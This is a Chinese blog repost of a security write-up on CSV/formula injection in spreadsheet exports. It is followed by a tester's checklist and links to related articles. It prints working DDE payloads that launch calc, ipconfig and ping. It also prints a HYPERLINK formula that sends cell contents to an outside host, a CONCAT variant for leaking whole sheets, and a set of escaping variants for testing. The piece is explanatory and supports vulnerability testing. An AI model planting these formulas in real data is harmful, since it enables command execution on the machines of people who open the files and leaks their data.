安全测试-CSV注入漏洞

最新推荐文章于 2024-07-18 15:40:54 发布
最新推荐文章于 2024-07-18 15:40:54 发布
阅读量1.4w 收藏 21
点赞数 3
分类专栏: 安全测试 CSV注入

 

CSV Injection Vulnerability

2016-05-17

Author: Evi1m0 (知道创宇404安全实验室)

Date: 2016-05-17

0x01 概述

现在很多应用提供了导出电子表格的功能(不限于 Web 应用),早在 2014 年 8月 29 日国外 James Kettle 便发表了《Comma Separated Vulnerabilities》文章来讲述导出表格的功能可能会导致注入命令的风险,因为导出的表格数据有很多是来自于用户控制的,如:投票应用、邮箱导出。攻击方式类似于 XSS :所有的输入都是不可信的。

 

0x02 公式注入 & DDE

我们知道在 Excel 中是可以运行计算公式的:  =1+5 ,它会将以 = 开头的单元格内容解释成公式并运行,单纯的运行计算公式可能没什么用,但这里可以用到 DDE 。Dynamic Data Exchange(DDE)是一款来自微软的古老技术,它是 Windows 下的一种跨进程通信的协议,支持 Microsoft Excel, LibreOffice 和 Apache OpenOffice。

执行 cmd 弹出计算器:

 

1

=cmd|' /C calc'!A0

573ada31da5ae

当然也可以使用 -cmd ,+cmd 来执行 DDE ,这个问题在2014年进行了修复(CVE-2014-3524),所以我们现在注入命令执行时软件会有如下的提示:

573adb7994037

573adb6c6d9dd

这也就是现在这个漏洞类型的特殊性,虽然软件有着这样的安全风险提醒但仍有大量的厂商承认并修复潜在的漏洞威胁:

其中很大的一方面是由于信任域的原因导致用户仍可能受到攻击,用户在 security.com 域下导出自己的Guestbook.csv ,但由于恶意用户偷偷的在留言板中插入了恶意代码:

 

1

=HYPERLINK("http://linux.im?test="&A2&A3,"Error: Please click me!")

这样就导致当用户在导出报表后倘若点击了某个单元格则会导致 A2,A3 的单元格内容泄露:

573adcfad9d32

所以说这个漏洞是要看背景的,由于它的特殊性(当然也可以配合社工),也就会出现厂商在审核此类漏洞时明明是一个 CSV Injection 漏洞但不会确认修复的情况。

0x03 实例

之前报告给腾讯的《CSV Injection on wj.qq.com》漏洞(已经修复):

573ade4459a27

用户发起投票后,攻击者可以注入CSV 公式/DDE代码,之后管理员进入投票结果页面导出 EXCEL :

 

1

2

3

4

➜  /tmp cat 465864_seg_1.csv

    "编号","开始答题时间","结束答题时间","自定义字段","1.您使用过xx网吗?","2.您的性别","3.您的年龄?","4.您的婚姻状况","5.您的最高学历","6.您的月收入(或每月生活费)","7.您是否觉得xx网很容易找到","8.您对网站logo的满意程度(logo即网站的品牌标识)","9.对导航栏目的满意程度","10.对网站页面设置及布局的满意程度","11.对网站内容编排的满意程度","12.对网站色彩风格的满意程度","13.对网站字体的满意程度","14.与同类网站相比,您对xx上的价格满意吗","15.您对xx目前整体的产品质量水平感觉如何","16.您觉得xx上的商品信息的可信度怎么样","17.您觉得xx的售后服务怎么样","18.您觉得xx更新信息的及时性怎么样","19.您的咨询或抱怨通常会得到及时的回复吗","20.您觉得xx的交易和评价几率真实可靠吗","21.您觉得xx网能很好的保证交易时的安全性吗","22.123123123",

    "1","2016-04-27 19:26:45","2016-04-27 19:27:27","","A.使用过","A.男","C.26-30岁","B.未婚","D.本科","I.不方便透露","B.否","3","3","3","3","3","3","3","3","3","3","3","A.是","A.是","A.是","",

    "2","2016-04-27 19:27:30","2016-04-27 19:28:09","","A.使用过","A.男","D.31-40岁","B.未婚","B.高中/中专","D.3001-5000元","A.是","3","3","4","4","4","4","4","4","4","4","4","A.是","B.否","A.是","=cmd|'/k ipconfig'!A0",

可以看到在用户留言的字段,成功的注入:=cmd|'/k ipconfig'!A0 ,当然也可以通过不触发安全警告的前提下窃取管理员导出的 CSV 数据,也就是前面提到的 =HYPERLINK 。

0x04 关于全文信息泄露

之前使用 &A1&A2&A3&A4 窃取表单数据的方式看起来有点笨重,我找到了一种新的方法来更方便的窃取全文信息:https://support.office.com/en-us/article/CONCAT-function-9b1a9a3f-94ff-41af-9736-694cbd6b4ca2?ui=en-US&rs=en-US&ad=US

APPLIES TO: Excel 2016, Excel Online, Excel for Android tablets, Excel Mobile, Excel for Android phones, Less.

2016 之前的 excel 和其他的版本的连接字符串的函数 concatenate 不支持 cell range 的语法,也不能自定义函数,这样的话就没有办法简写,只能生成比较长的url,但 2016 之后的 excel 我们可以使用 concat 函数,支持传入一个 range,比如 concat(A1:A10) ,这样便能直接读取整个表格中的数据。

0x05 修复方案

过滤公式所用到的特殊字符(不应盲目过滤),因为个别情况下可能会影响产品的正常功能使用:

  • 手机号码 +86 xxxxx
  • 邮箱地址 @test.com
  • 字符串 test-injection
  • ...

0x06 参考

http://blog.knownsec.com/2016/05/csv-injection-vulnerability/

作者:niubl | Categories:安全研究技术分享 | Tags:

 

 

【排查场景及方法】

 

1、用户登录系统,进行相应的的业务操作,开启burpsuite拦截,输入通过转义字符%20空格、%0a换行伪造过的信息

2、构造指定的数据=cmd|'/c ping 127.0.0.1 -t'!A1保存在描述参数的输入框中;当这些信息被其他业务员/管理员导出成CSV文件后,打开CSV文件,其他业务员/管理员的系统会执行构造的命令,存在执行注入ping 127.0.0.1的风险。

其他常见csv注入输入场景有:a、burpsuite抓取登录报文,修改用户名为"=cmd|'/c ping 127.0.0.1 -t'!A1“,查看导出的安全日志中是否会执行构造的命令b、操作失败日志记录场景(比如上传文件场景,将文件名修改为"=cmd|'/c ping 127.0.0.1 -t'!A1“)以及其他可被用户控制的入参操作场景,且这些用户的控制入参可被记录到可导出日志中,查看导出的安全日志中是否会执行构造的命令

建议构造如下数据:

     ① =cmd|'/c calc'!'A1'
     ② \",=cmd|'/c calc'!'A1'
     ③ ",=cmd|'/c calc'!'A1'
     ④ xxx,=cmd|'/c calc'!'A1'
     ⑤ xxx\n=cmd|'/c calc'!'A1'

3、覆盖产品中所有存在导出CSV/Excel等格式的场景

iSelenium
关注
  • 3
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web 安全之 CSV 注入攻击详解
路多辛的所思所想
02-25 1475
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV 文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV 文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV 文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
【安全】【测试思路】文件上传下载之绕过上传时内容校验的DDE注入攻击
次次次不吃饼干_的博客
07-28 1555
【安全】【测试思路】文件上传下载之基于bypass的DDE注入攻击DDE注入介绍测试流程图测试思路服务器搭建攻击脚本参考上传文件准备 DDE注入介绍   DDE(Dynamic Data Exchange,动态数据交换)是应用之间传输数据的一种方法。Excel可以使用这种机制,根据外部应用的处理结果来更新单元格的内容。因此,如果我们制作包含(恶意)DDE公式的xlsx/csv文件,那么在打开该文件时,Excel就会尝试执行外部应用,以达到攻击的目的。 测试流程图 测试思路 服务器搭建   在这里,咱们可以使
解决方案-注入漏洞原理-新手网安自学
最新发布
程序员六七的博客
07-18 718
Web安全之SQL注入漏洞 本节知识点 SQL注入原理 前言 结构化查询语句(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数...
CSV注入漏洞
SHUY96的博客
12-30 1734
一、背景 最近在开发中,遇到CSV注入漏洞,特此研究一下。我们知道“对于网络安全来说,一切的外部输入都是不可信的”,但在我们大脑的第一印象中会把csv文件当做是普通的文件,未对其保持足够的警惕,从而引起安全漏洞问题。 二、定义 攻击人员通过在CSV中构造恶意的命令或函数,当正常用户使用Excel打开这个CSV文件时,恶意的命令或函数被执行,从而导致攻击的行为。 三、产生原因 1、CSV文件中的几个特殊字符+、-、@、=都可用于在Microsoft Excel中触发公式解释 例如:在CSV单元格中输入“=1+
csv注入漏洞原理&&实战
weixin_30836759的博客
08-03 1897
前言 为了找工作,巩固巩固知识。本文会介绍 csv 注入漏洞的原理,最后给出一个示例。 正文 在 csv 文件 和 xlsx 文件中的每一项的值如果是 =, @, +, - 就会被 excel 识别为一个 公式, 此时可以注入 系统命令 实现 命令执行。 常用 payload : =cmd|'/c calc'!A0 # 弹计算器 =MSEXCEL|'\..\..\..\Windows\S...
CSV Injection (CSV 注入攻击)
cwxbox
01-28 1202
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。
CVS泄露总结
王嘟嘟的博客
04-08 3532
0x00 前言 导航:https://blog.csdn.net/qq_36869808/article/details/88895109 0x01 基础 CVS是一个C/S系统,多个开发人员通过一个中心版本控制系统来记录文件版本,从而达到保证文件同步的目的。 0x02 利用方式 主要是针对 CVS/Root以及CVS/Entries目录,直接就可以看到泄露的信息。 这里扫描的时候还是讲这两个当做...
信息安全_数据安全_csv-w12-ephemeral-devops-adventu.pdf
08-21
在信息安全领域内,可信编译技术可确保从源代码到可执行文件的转换过程中不引入安全漏洞。 数字风险指的是与数字技术相关的安全风险,包括数据泄露、网络攻击等。在日常工作中,评估和管理数字风险对于维护企业安全...
网络安全 sql注入工具sqlmap使用
01-13
Sqlmap可以自动检测和利用SQL注入漏洞,获取数据库敏感信息,包括数据库结构、表名、字段名、数据内容等。 数据库管理系统(DBMS)中存在的SQL注入漏洞是指攻击者可以通过构造恶意SQL语句,访问、修改或控制数据库...
完整的漏洞赏金备忘单.pdf
10-06
5. **CSV注入**:当CSV文件用于数据交换时,恶意数据可能导致解析错误或执行代码。应使用安全的库处理CSV数据,避免用户数据直接写入文件。 6. **命令注入**:攻击者通过注入恶意命令到应用,执行服务器上的操作...
SoapUI-Pro-5.1.2版本测试工具
07-19
你可以进行安全扫描,检测潜在的安全漏洞,如SQL注入、XSS攻击等。 此外,SoapUI Pro 5.1.2版本还包括强大的报告功能,可以自定义生成详细的测试报告,方便团队成员共享和分析测试结果。它还支持与持续集成工具(如...
Proiect-test:测试
03-30
9. **安全测试**:检查软件的安全漏洞,如SQL注入、跨站脚本(XSS)等,可以使用OWASP ZAP等工具进行自动化扫描。 10. **兼容性测试**:确保软件在不同的操作系统、浏览器或设备上都能正常工作。 在进行测试时,团队...
Web安全-浅析CSV注入漏洞的原理及利用
道阻且长,行则将至。
05-01 4131
文章目录漏洞简介漏洞原理漏洞利用命令执行钓鱼攻击反弹shell漏洞实例Twitter网站Hackerone漏洞挖掘漏洞防御 漏洞简介 CSV 注入(CSV Injection)漏洞通常会出现在有导出文件 (.csv/.xls) 功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL 会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理 人们通常认为 CSV 或 xls 文件中包含的文本不会有任何安全风险,这是比较大的一个误区。
csv注入文件
HoAd'blog
08-06 610
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
文件下载触发的DDE注入
一杯咖啡的渗透记忆
11-16 1226
目录 一、定义 二、原理 三、危害 四、修复 一、定义 DDE注入 动态数据交换(DDE),全称DynamicData Exchange,是Windows下进程间通信协议,支持Microsoft Excel,LibreOffice和Apache OpenOffice。Excel、Word、Rtf、Outlook都可以使用这种机制,根据外部应用的处理结果来更新内容。因此,如果我们制作包含DDE公式的CSV文件,那么在打开该文件时,Excel就会尝试执行外部应用。 二、原理 Excel解析
java程序拦截dde漏洞问题_Office DDE漏洞学习笔记
weixin_42515512的博客
03-01 648
1、前言2017年下半年爆发出来的Office漏洞,一直没有空做笔记记录。在病毒分析中也看到有利用这个漏洞的样本,针对Office系列软件发起的钓鱼攻击和APT攻击一直是安全攻防的热点。2、office DDEMicrosoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容,比如说在一个 w...
Windows系统 clac命令详解,Windows系统使用命令行打开计算器
热门推荐
wangyuxiang946的博客
11-10 1万+
「作者主页」:士别三日wyx 第一步、打开cmd 按下 win 键,输入 cmd 后回车,打开「命令提示符」 第二步、打开计算器 在打开的cmd窗口中,输入 calc 后回车,即可在新弹出的窗口中打开计算器 第三步、认识 calc Windows系统的命令本质上都是「可执行程序」,默认存放在 C:\Windows\System32 目录下, calc 命令对应的便是 calc.exe 文件 当我们执行 calc 命令时,本质上就是执行了 calc.exe 这个程序,因此,当我们在命令行输入.
JAVA解决CSV注入漏洞的代码
搬砖人生的博客
10-29 3570
JAVA处理写入CSV的命令,函数等。处理特殊字符(“+、-、@、=”)以及逗号引起的格式问题
json-to-csv stream
10-04
json-to-csv stream是一种用于将JSON数据流转换成CSV格式的工具。JSON是一种常用的数据交换格式,而CSV则是一种简单的表格数据格式。使用json-to-csv stream可以方便地将JSON数据转换成CSV格式,以便于更容易地进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值